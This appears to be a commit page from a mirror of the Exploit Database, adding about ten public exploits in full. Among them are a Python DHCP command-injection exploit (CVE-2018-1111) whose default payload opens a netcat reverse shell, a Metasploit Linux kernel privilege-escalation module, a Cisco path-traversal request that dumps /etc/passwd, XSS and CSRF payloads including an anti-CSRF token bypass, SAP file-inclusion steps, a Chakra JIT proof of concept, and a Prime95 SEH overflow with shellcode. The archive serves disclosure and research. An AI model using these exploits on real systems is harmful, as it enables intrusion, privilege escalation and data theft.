bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-19

Browse source 
12 changes to exploits/shellcodes

Microsoft Edge - 'Array.filter' Info Leak
Microsoft Edge - 'Array.filter' Information Leak

Microsoft Edge Chakra JIT - Bound Check Elimination Bug
Windows - Local Privilege Escalation
Windows WMI - Recieve Notification Exploit (Metasploit)
Microsoft Windows - Local Privilege Escalation
Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)
Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)
Prime95 29.4b8 - Stack Buffer Overflow (SEH)
DynoRoot DHCP - Client Command Injection
Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)

Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution

Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)

HPE iMC 7.3 - Remote Code Execution (Metasploit)
Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Monstra CMS before 3.0.4 - Cross-Site Scripting
SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure
Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery
Cisco SA520W Security Appliance - Path Traversal
SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
This commit is contained in:
Offensive Security 2018-05-19 05:01:48 +00:00
parent 5aca1b9763
commit 41ea196761
13 changed files with 908 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
exploits/hardware/local/44644.txt Normal file
View file

@ -0,0 +1,20 @@
For Xbox-SystemOS version: 10.0.14393.2152 (rs1_xbox_rel_1610 161208-1218) fre, 12/14/2016
Other versions will most likely need modifications to the script.
**Credits**:
- https://github.com/theori-io/chakra-2016-11
- https://bugs.chromium.org/p/project-zero/issues/detail?id=952
- https://bugs.chromium.org/p/project-zero/issues/detail?id=945
**Info**:
It is not sufficient to start an .exe via shellcode ;)
Exploiters, be creative!
It is desired to find a way to invoke edge engine when console is offline
Greets from unknownv2 & mon0 _
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44644.zip

55
exploits/hardware/webapps/44650.txt Normal file
View file

@ -0,0 +1,55 @@
# Title: Cisco SA520W Security Appliance - Path Traversal
# Author: Nassim Asrir
# Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: https://www.cisco.com/
# About Product:
===============
Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees.
They combine firewall, VPN, and optional intrusion prevention system (IPS), email, and web security capabilities. Whether in the office or working remotely, your employees can securely access the resources they need, while your business is protected from unauthorized access and Internet threats.
# POC
====================
//In our poc we will try to read /etc/passwd
The vulnerable Parameter: thispage
payload: ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm
Request Type: POST
Request:
=======
POST /scgi-bin/platform.cgi HTTP/1.1
Host: host-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://70.186.255.169/scgi-bin/platform.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
Connection: close
Upgrade-Insecure-Requests: 1
thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0
Response:
========
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 00:00:41 GMT
Server: Embedded HTTP Server.
Connection: close
root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
#Timeline:
=========
18 Apr 2018 : First Contact with Cisco.
18 Apr 2018 : Cisco Ask me for more details about the vulnerability.
18 Apr 2018 : Details sent to Cisco
19 Apr 2018 : Ask for update
15 May 2018 : Cisco say "The product you reference went end of support in April 2016 No further action will be taken."
18 May 2018 : Public Disclosure

65
exploits/linux/local/44652.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: DynoRoot DHCP - Client Command Injection
# Date: 2018-05-18
# Exploit Author: Kevin Kirsche
# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111
# Exploit Discoverer: Felix Wilhelm
# Vendor Homepage: https://www.redhat.com/
# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x
# Tested on: CentOS Linux release 7.4.1708 (Core) / NetworkManager 1.8.0-11.el7_4
# CVE : CVE-2018-1111
#!/usr/bin/env python
from argparse import ArgumentParser
from scapy.all import BOOTP_am, DHCP
from scapy.base_classes import Net
class DynoRoot(BOOTP_am):
function_name = "dhcpd"
def make_reply(self, req):
resp = BOOTP_am.make_reply(self, req)
if DHCP in req:
dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1]))
for op in req[DHCP].options
if isinstance(op, tuple) and op[0] == "message-type"]
dhcp_options += [("server_id", self.gw),
("domain", self.domain),
("router", self.gw),
("name_server", self.gw),
("broadcast_address", self.broadcast),
("subnet_mask", self.netmask),
("renewal_time", self.renewal_time),
("lease_time", self.lease_time),
(252, "x'&{payload} #".format(payload=self.payload)),
"end"
]
resp /= DHCP(options=dhcp_options)
return resp
if __name__ == '__main__':
parser = ArgumentParser(description='CVE-2018-1111 DynoRoot exploit')
parser.add_argument('-i', '--interface', default='eth0', type=str,
dest='interface',
help='The interface to listen for DHCP requests on (default: eth0)')
parser.add_argument('-s', '--subnet', default='192.168.41.0/24', type=str,
dest='subnet', help='The network to assign via DHCP (default: 192.168.41.0/24)')
parser.add_argument('-g', '--gateway', default='192.168.41.254', type=str,
dest='gateway', help='The network gateway to respond with (default: 192.168.41.254)')
parser.add_argument('-d', '--domain', default='victim.net', type=str,
dest='domain', help='Domain to assign (default: victim.net)')
parser.add_argument('-p', '--payload', default='nc -e /bin/bash 192.168.41.2 1337', type=str,
dest='payload', help='The payload / command to inject (default: nc -e /bin/bash 192.168.41.2 1337)')
args = parser.parse_args()
server = DynoRoot(iface=args.interface, domain=args.domain,
pool=Net(args.subnet),
network=args.subnet,
gw=args.gateway,
renewal_time=600, lease_time=3600)
server.payload = args.payload
server()

203
exploits/linux/local/44654.rb Executable file
View file

@ -0,0 +1,203 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',
'Description' => %q{
This module exploits a heap-out-of-bounds write in the packet_set_ring
function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel
to execute code as root (CVE-2017-7308).
The bug was initially introduced in 2011 and patched in version 4.10.6,
potentially affecting a large number of kernels; however this exploit
targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,
including Linux distros based on Ubuntu Xenial, such as Linux Mint.
The target system must have unprivileged user namespaces enabled and
two or more CPU cores.
Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on Linux Mint 18 (x86_64)
with kernel versions:
4.8.0-34-generic;
4.8.0-36-generic;
4.8.0-39-generic;
4.8.0-41-generic;
4.8.0-42-generic;
4.8.0-44-generic;
4.8.0-45-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrey Konovalov', # Discovery and C exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Mar 29 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'EDB', '41994' ],
[ 'CVE', '2017-7308' ],
[ 'BID', '97234' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],
[ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],
[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],
[ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]
],
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
cores = get_cpu_info[:cores].to_i
min_required_cores = 2
unless cores >= min_required_cores
vprint_error "System has less than #{min_required_cores} CPU cores"
return CheckCode::Safe
end
vprint_good "System has #{cores} CPU cores"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
if kptr_restrict? && dmesg_restrict?
vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('poc.c')
rm_f "#{executable_path}.c"
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
output = cmd_exec "#{executable_path} #{payload_path}"
output.each_line { |line| vprint_status line.chomp }
print_status 'Deleting executable...'
rm_f executable_path
Rex.sleep 5
print_status 'Deleting payload...'
rm_f payload_path
end
end

47
exploits/linux/webapps/44647.txt Normal file
View file

@ -0,0 +1,47 @@
# Application: SAP NetWeaver Web Dynpro 6.4 to 7.5 - Information disclosure
# Versions Affected: SAP NetWeaver 6.4 - 7.5
# Vendor URL: http://SAP.com
# Bugs: Information disclosure (Enumerate users)
# Sent: 2016-12-15
# Reported: 2016-12-15
# Date of Public Advisory: 09.02.2016
# Reference: SAP Security Note 2344524
# Author: Richard Alviarez (SIA Group)
# CVE: N/A
# 1. ADVISORY INFORMATION
# Title: SAP NetWeaver Web Dynpro information disclosure (Enumerate users)
# Advisory ID: 2344524
# Risk: Medium
# Date published: 20.12.2016
# 2. VULNERABILITY DESCRIPTION
# Anonymous attacker can use a special HTTP request to get information
# about SAP NetWeaver users.
# 3. VULNERABLE PACKAGES
# SAP NetWeaver Web Dynpro 6.4 - 7.5
# Other versions are probably affected too, but they were not checked.
# 4. TECHNICAL DESCRIPTION
# A potential attacker can use the vulnerability in order to reveal
# information about user names,
# first and last names, and associated emails, this can provide an attacker
# with enough information
# to make a more accurate and effective attack
# Steps to exploit this vulnerability
1. Open
http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate
or
http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate
page on SAP server
2. Press "Change processor" button
3. and in the "find" section, put the initial or name to be searched,
followed by a *
You will get a list of SAP users and information.

43
exploits/linux/webapps/44655.txt Normal file
View file

@ -0,0 +1,43 @@
# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
# Application:SAP B2B OR B2C is CRM
# Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b)
# Vendor URL: http://SAP.com
# Bugs: SAP LFI in B2B OR B2C CRM
# Sent: 2018-05-03
# Reported: 2018-05-03
# Date of Public Advisory: 2018-02-09
# Reference: SAP Security Note 1870255656
# Author: Richard Alviarez
# 1. VULNERABLE PACKAGES
# SAP LFI in B2B OR B2C CRM v2.x to 4.x
# Other versions are probably affected too, but they were not checked.
# 2. TECHNICAL DESCRIPTION
# A possible attacker can take advantage of this vulnerability
# to obtain confidential information of the platform,
# as well as the possibility of writing in the logs of the
# registry in order to get remote execution of commands and take control of the system.
# 3. Steps to exploit this vulnerability
A. Open
https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml
Other vulnerable parameters:
https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml
page on SAP server
B. Change parameter {name} for example icss_b2b or other name....
C. Change "/WEB-INF/web.xml" for other files or archives internal.
# 4. Collaborators
# - CuriositySec
# - aDoN90
# - Vis0r

70
exploits/php/webapps/44645.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-17
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499
# Version: 3.0
# Tested on: windows
# POC 1 : Cross site scripting :
1) Create an account and go to your profile.
2) When we want to put "<script></script>" in the fields,"script" will be
replaced with null.
so we can bypass this filter by using javascript's events like
"onmouseover" or "oninput" .
Put one of these payloads into the fields :
1 - " oninput=alert('xss') "
2 - " onmouseover=alert('xss') "
3) You will get an alert box inside the page . ( after put something into
the fields or move mouse on the fields)
# POC 2 : Cross-Site request forgery :
# With csrf vulnerability,attacker can easily change user's authentication.
# So in this script , we have anti-CSRF token .We can't change user's
# information without token.
# but there is a vulnerable parameter which has reflected xss in another page
# of this script.
# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]
# Now we can bypass anti-csrf by this parameter and using javascript:
# Exploit :
"/><form action="
http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"
method="POST">
<input type="hidden" name="first&#95;name" value="a" />
<input type="hidden" name="address"
value=""&#32;oninput&#61;alert&#40;document&#46;domain&#41;&#32;""
/>
<input type="hidden" name="pincode" value="a" />
<input type="hidden" name="phone" value="100000000" />
<input type="hidden" name="last&#95;name" value="anything" />
<input type="hidden" name="&#95;token" value="" />
</form>
<script>
var token = ' ';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var secPage = this.responseXML;
token = secPage.forms[0].elements[0].value;
console.log(token);
}
}
req.open("GET","/demo/healwire/account-page",true);
req.responseType = "document";
req.send();
window.setTimeout(function(){
document.forms[0].elements[5].value = token;
document.forms[0].submit();
},3000)
</script>
# You can also send 2 ajax requests instead of using form .
# Encode this payload and put this into "msg" parameter
# JSON result after 3 seconds :
status "SUCCESS"
msg "User profile updated !"

48
exploits/php/webapps/44646.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Monstra CMS 3.0.4 - Cross-Site Scripting
# Date: 2018-05-17
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://monstra.org
# Software Link: https://monstra.org
# Version: before 3.0.4
# Tested on: Pardus / Win10 AppServer
# Proof Of Concept
# Monstra is a modern and lightweight Content Management System.
# Prints get request between script tags on page
Payload ?vrk2f'-alert(1)-'ax8vv=1
GET Request
GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1
Host: 192.168.1.106
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Response
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new
Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js
','_mga');
_mga('create', '', 'auto');
_mga('send', 'pageview', {
'page': 'http://192.168.1.106/test/monstra-3.0.4/?vrk2f%27-alert(1',
'title': ''
});
</script></body>
http://localhost/test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1

31
exploits/php/webapps/44651.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery
# Date: 2018-05-18
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/classifieds-multipurpose-portal-infinity-market/16572285?s_rank=1520
# Version: 1.6.2
# Tested on: Kali linux
# Description : CSRF vulnerability allows attacker to change user's information directly .
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://geniuscript.com/classified/index.php/frontend/myprofile/en" method="POST">
<input type="hidden" name="name&#95;surname" value="decode" />
<input type="hidden" name="username" value="user" />
<input type="hidden" name="password" value="anything" />
<input type="hidden" name="password&#95;confirm" value="anything" />
<input type="hidden" name="address" value="Cyro&#32;trento&#32;23" />
<input type="hidden" name="description" value="My&#32;description&#32;2" />
<input type="hidden" name="phone" value="&#43;10000000" />
<input type="hidden" name="mail" value="sanljiljan&#64;geniuscript&#46;com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

151
exploits/windows/dos/44653.js Normal file
View file

@ -0,0 +1,151 @@
/*
Chakra uses the InvariantBlockBackwardIterator class to backpropagate the information about the hoisted bound checks. But the class follows the linked list instaed of the control flow. This may lead to incorrectly remove the bound checks.
In the following code, currentBlock's block number is 4 and hoistBlock's block number is 1 (please see the IR code). I assume it should visit 4 -> 3 (skipped) -> 1 (break) in order with following the control flow, but it actually visits 4 -> 3 (skipped) -> 2 -> 1 (break) in order. This makes the block 2 have the wrong information about the bounds which affects the bound checks in the block 5 to be removed.
https://github.com/Microsoft/ChakraCore/blob/48c73e51c3e0fb36a08fa844cdb88c9d8a54de32/lib/Backend/GlobOpt.cpp#L14667
if(hoistBlock != currentBlock)
{
for(InvariantBlockBackwardIterator it(this, currentBlock->next, hoistBlock, nullptr);
it.IsValid();
it.MoveNext())
{
BasicBlock *const block = it.Block();
...
PoC:
*/
function opt(arr, idx) {
((arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
}
function main() {
let arr = new Uint32Array(1);
for (let i = 0; i < 10000; i++) {
opt(arr);
}
}
main();
/*
Here's the IR code for the PoC:
FunctionEntry #
---------
BLOCK 0: Out(1, 2)
$L8: #
s1[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var #
s21(s2)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483632 (0x7FFFFFF0)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s3[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #
s22(s4)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483633 (0x7FFFFFF1)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s23(s5)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 286331153 (0x11111111)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s24(s6)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
s7[LikelyCanBeTaggedValue_Uint32Array].var = ArgIn_A prm2<40>[LikelyCanBeTaggedValue_Uint32Array].var! #
s8[LikelyUndefined_CanBeTaggedValue].var = ArgIn_A prm3<48>[LikelyUndefined_CanBeTaggedValue].var! #
Line 2: arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
Col 7: ^
StatementBoundary #0 #0000
BailOnNotArray s7[LikelyCanBeTaggedValue_Uint32Array].var #0000 Bailout: #0000 (BailOutOnNotArray)
s25.u32 = LdIndir [s7[Uint32Array].var+32].u32 #0000
NoImplicitCallUses s25.u32 #0000
ByteCodeUses s7 #0000
s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0000
s15[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004
ByteCodeUses s10 #0004
BrNeq_I4 $L4, s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32!, 2147483632 (0x7FFFFFF0).i32 #0004
---------
BLOCK 1: In(0) Out(2, 3)
$L7: #0008
s15[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008
s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008
BoundCheck 2147483633 < s25.u32 #000f Bailout: #000f (BailOutOnFailedHoistedBoundCheck)
s27.u64 = LdIndir [s7[Uint32Array].var+56].u64 #000f
NoImplicitCallUses s25.u32 #000f
s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483632].var #000f Bailout: #000f (BailOutConventionalTypedArrayAccessOnly)
ByteCodeUses s16 #0015
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0015
s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0018
ByteCodeUses s16 #0018
BrTrue_I4 $L3, s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0018
---------
BLOCK 2: In(0, 1) Out(5)
$L4: #001c
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #001c
Br $L2 #001e
---------
BLOCK 3: In(1) Out(4) DeadOut(5)
$L3: #0021
NoImplicitCallUses s25.u32 #0021
ByteCodeUses s7 #0021
s30(s17)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0021
s18[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025
s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025
ByteCodeUses s17 #0025
---------
BLOCK 4: In(3) Out(8, 5)
$L6: #0029
s18[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029
s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029
NoImplicitCallUses s25.u32 #0030
s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483633].var #0030 Bailout: #0030 (BailOutConventionalTypedArrayAccessOnly)
ByteCodeUses s19 #0036
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0036
s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0039
ByteCodeUses s19 #0039
BrTrue_I4 $L9, s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0039
---------
BLOCK 5: In(2, 4) Out(6) DeadIn(3)
$L2: #003d
s32.u64 = LdIndir [s7[Uint32Array].var+56].u64 #003d
NoImplicitCallUses s25.u32 #003d
[s7[Uint32Array][seg: s32][segLen: s25][><].var+286331153].var = StElemI_A 4660 (0x1234).i32 #003d Bailout: #003d (BailOutConventionalTypedArrayAccessOnly)
s33(s20)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0043
ByteCodeUses s20 #0046
s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0046
s34.u64 = Ld_A s32.u64 #004b
Br $L1 #004b
---------
BLOCK 8: **** Air lock Block **** In(4) Out(6)
$L9: #004b
s34.u64 = Ld_A s27.u64 #004b
Br $L1 #004b
---------
BLOCK 6: In(8, 5) Out(7)
$L1: #004b
s0[Undefined].var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #004b
Line 3: }
Col 1: ^
StatementBoundary #1 #004d
StatementBoundary #-1 #004d
Ret s0[Undefined].var! #004d
---------
BLOCK 7: In(6)
$L5: #
----------------------------------------------------------------------------------------
*/

43
exploits/windows/local/44649.py Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: Prime95 Local Buffer Overflow (SEH)
# Date: 13-4-2018
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: https://www.mersenne.org/
# Software Link: https://www.mersenne.org/download/#download
# Version: 29.4b8
# Tested on: Windows 10 Pro x64 SPANISH Windows 7 Home Premium x86 SPANISH Windows XP SP3 SPANISH
# Category: Windows Local Exploit
# How to use: open the program go to test-PrimeNet-check the square-Connections paste the contents of open.txt in the optional proxy hostname field and the calculator will open
buffer = "A" * 660
nseh = "\xeb\x06\x90\x90"
seh = "\x6B\xB0\xED\x6A" #pop esi # pop ebx # ret | {PAGE_EXECUTE_READ} [libgmp-10.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0
nop = "\x90" * 16
#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
